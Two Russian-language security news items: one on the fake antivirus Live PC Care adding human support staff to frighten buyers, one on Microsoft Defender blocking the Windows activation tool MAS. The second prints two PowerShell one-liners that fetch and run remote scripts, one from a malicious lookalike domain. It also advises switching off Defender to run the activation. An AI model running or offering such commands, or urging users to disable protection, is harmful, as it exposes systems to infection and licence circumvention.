У фальшивых антивирусов появилась техподдержка

У фальшивых антивирусов появилась техподдержка

...

Продавцы фальшивого антивируса снабдили программу службой онлайновой технической поддержки, чтобы увеличить продажи продукта. В последнее время поддельные антивирусные
и противошпионские утилиты получили небывалую популярность. Мошенники
распространяют программы, которые лишь делают видимость, что находят и
уничтожают вредоносное ПО. Кроме того, очень часто мошеннические
приложения содержат троянские программы.

Схема работы фальшивого антивируса Live PC Care работает следующим образом.

После того как пользователь, с помощью бесплатной пробной версии
якобы мощного антивируса, загрузит, установит и проведет сканирование
системы, Live PC Care обязательно выдаст целый список обнаруженных
вредоносных программ — вирусов,
троянов, спам-ботов… Для излечения зараженного опаснейшими вредоносами
компьютера предлагается приобрести полнофункциональную версию
"антивируса".

Недавно Live PC Care обзавелся онлайновой службой технической
поддержки, причем на вопросы пользователей отвечает человек, а не
программа-робот. Во время общения с техподдержкой, в задачи которой
входит нагнетание страха, у пользователя возникает желание
незамедлительно приобрести Live PC Care за 30–100 долларов.

источник

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru